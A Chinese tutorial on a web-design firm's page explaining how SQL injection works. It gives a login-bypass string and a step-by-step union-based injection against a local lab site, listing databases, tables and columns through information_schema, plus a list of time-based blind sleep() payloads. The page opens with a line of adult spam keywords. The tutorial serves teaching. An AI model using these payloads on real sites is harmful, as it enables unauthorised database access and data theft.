真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

SQL注入的原理介紹

這篇文章主要講解了“SQL注入的原理介紹”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“SQL注入的原理介紹”吧!

站在用戶的角度思考問題,與客戶深入溝通,找到德興網(wǎng)站設(shè)計(jì)與德興網(wǎng)站推廣的解決方案,憑借多年的經(jīng)驗(yàn),讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合,創(chuàng)造個(gè)性化、用戶體驗(yàn)好的作品,建站類型包括:成都做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、成都外貿(mào)網(wǎng)站建設(shè)、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、域名申請(qǐng)、網(wǎng)絡(luò)空間、企業(yè)郵箱。業(yè)務(wù)覆蓋德興地區(qū)。

原理介紹

當(dāng)Web應(yīng)用向后臺(tái)數(shù)據(jù)庫(kù)傳遞SQL語句進(jìn)行數(shù)據(jù)庫(kù)操作時(shí)。如果對(duì)用戶輸入的參數(shù)沒有經(jīng)過嚴(yán)格的過濾處理,那么攻擊者就可以構(gòu)造特殊的SQL語句,直接輸入數(shù)據(jù)庫(kù)進(jìn)行執(zhí)行,獲取或修改數(shù)據(jù)庫(kù)中的數(shù)據(jù)。

SQL注入漏洞有兩個(gè)關(guān)鍵條件:

  • 用戶能控制輸入的內(nèi)容

  • web應(yīng)用把用戶輸入的內(nèi)容帶入到數(shù)據(jù)庫(kù)中執(zhí)行

接下來將用自己本地搭建的環(huán)境來演示SQL注入。。。。

別想了,我怎么可能把真實(shí)網(wǎng)站的注入過程寫在博客上,不想請(qǐng)喝茶

一、萬能密碼

打開網(wǎng)站的登陸界面,我們沒有密碼是無法登陸的但是由于網(wǎng)站開發(fā)者在開發(fā)網(wǎng)站時(shí)沒有對(duì)登陸進(jìn)行過濾,導(dǎo)致存在萬能密碼漏洞

SQL注入的原理介紹

輸入萬能密碼 root ‘ or 1 = 1#

SQL注入的原理介紹

點(diǎn)擊登陸,就會(huì)提示我們登陸成功!

SQL注入的原理介紹

看,我們已經(jīng)登陸進(jìn)來了!

SQL注入的原理介紹

原理

登陸語句是這樣的:

SELECT * FROM admin WHERE Username=’root’ and Password =’pass’

查詢admi表里所有Username =我們輸入的Username 并且Password =我們輸入的Password的結(jié)果

只要結(jié)果不為空就為真,也就是登陸成功

我們輸入萬能密碼root ‘ or 1 = 1# 構(gòu)造

SELECT * FROM admin WHERE Username=’root ‘ or 1 = 1#’and Password =’pass’

通過注釋符號(hào)#注釋掉and Password =’pass,在root’ or 1=1 的基礎(chǔ)上使結(jié)果為真成立。

SQL注入

SQL注入分類

SQL注入,從代碼角度來看:

分為數(shù)字型和字符型,又根據(jù)字符型和數(shù)字型可以外加()和字符型能使用雙引號(hào)和單引號(hào)

分為以下幾種:

1、selent * from users where id=1純數(shù)字

2、selent * from users where id=’1’只加單引號(hào)

3、selent * from users where id=”1”只加雙引號(hào)

4、selent * from users where (id=1)數(shù)字加括號(hào)

5、selent * from users where (id=’1’)數(shù)字加單引號(hào)

6、selent * from users where (id=”1”)數(shù)字加雙引號(hào)

如果寫的不夠清晰,我們可以用一張圖來解釋

SQL注入的原理介紹

實(shí)例演示

打開搭建好的環(huán)境,點(diǎn)擊打開一個(gè)頁(yè)面來測(cè)試有沒有SQL注入

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=55’ 出現(xiàn)問題,可能存在注入

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=55’ %23 加%23后恢復(fù)正常,可以判斷為’1’注入

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=55’ order by 1 %23 使用order by 1 2 3 4 進(jìn)行測(cè)試,發(fā)現(xiàn)查詢的結(jié)果為12列,再這里我只顯示結(jié)尾截圖,方便后續(xù)使用union select

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3,4,5,6,7,8,9,10,11,12 %23 發(fā)現(xiàn)頁(yè)面不顯示union select的內(nèi)容,嘗試使用limit或者是將前邊的內(nèi)容改為空

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3 limit 1,1 %23

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3 %23 可以顯示union select后的內(nèi)容,8是顯示結(jié)果的地方

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,user(),9,10,11,12 %23 把8位改為user()和database()發(fā)現(xiàn)可以顯示用戶和數(shù)據(jù)庫(kù)

SQL注入的原理介紹

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(schema_name) from information_schema.SCHEMATA),9,10,11,12 %23

查詢所有的庫(kù)名字

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(table_name) from information_schema.TABLES where table_schema = ‘test’),9,10,11,12 %23

查詢出test庫(kù)中所有的表名

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(column_name) from information_schema.COLUMNS where table_schema = ‘test’ and table_name = ‘a(chǎn)dmin’),9,10,11,12 %23 查詢處test庫(kù)中admin表所有的字段名字

SQL注入的原理介紹

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(news) from test.admin ),9,10,11,12 %23

查詢security庫(kù)中users表中的數(shù)據(jù),由于這個(gè)表中沒有數(shù)據(jù)所以不會(huì)有顯示,但在真實(shí)環(huán)境中是會(huì)看到內(nèi)容的

SQL注入的原理介紹

延時(shí)盲注

延時(shí)盲注會(huì)有以下幾種情況,暫不做演示

1’ and sleep(5) %23

1’) and sleep(5) %23

1’)) and sleep(5) %23

1 and sleep(5) %23

1) and sleep(5) %23

1)) and sleep(5) %23

1” and sleep(5) %23

1”) and sleep(5) %23

1”)) and sleep(5) %23

感謝各位的閱讀,以上就是“SQL注入的原理介紹”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)SQL注入的原理介紹這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是創(chuàng)新互聯(lián),小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!


當(dāng)前題目:SQL注入的原理介紹
網(wǎng)頁(yè)網(wǎng)址:http://weahome.cn/article/ggpgig.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部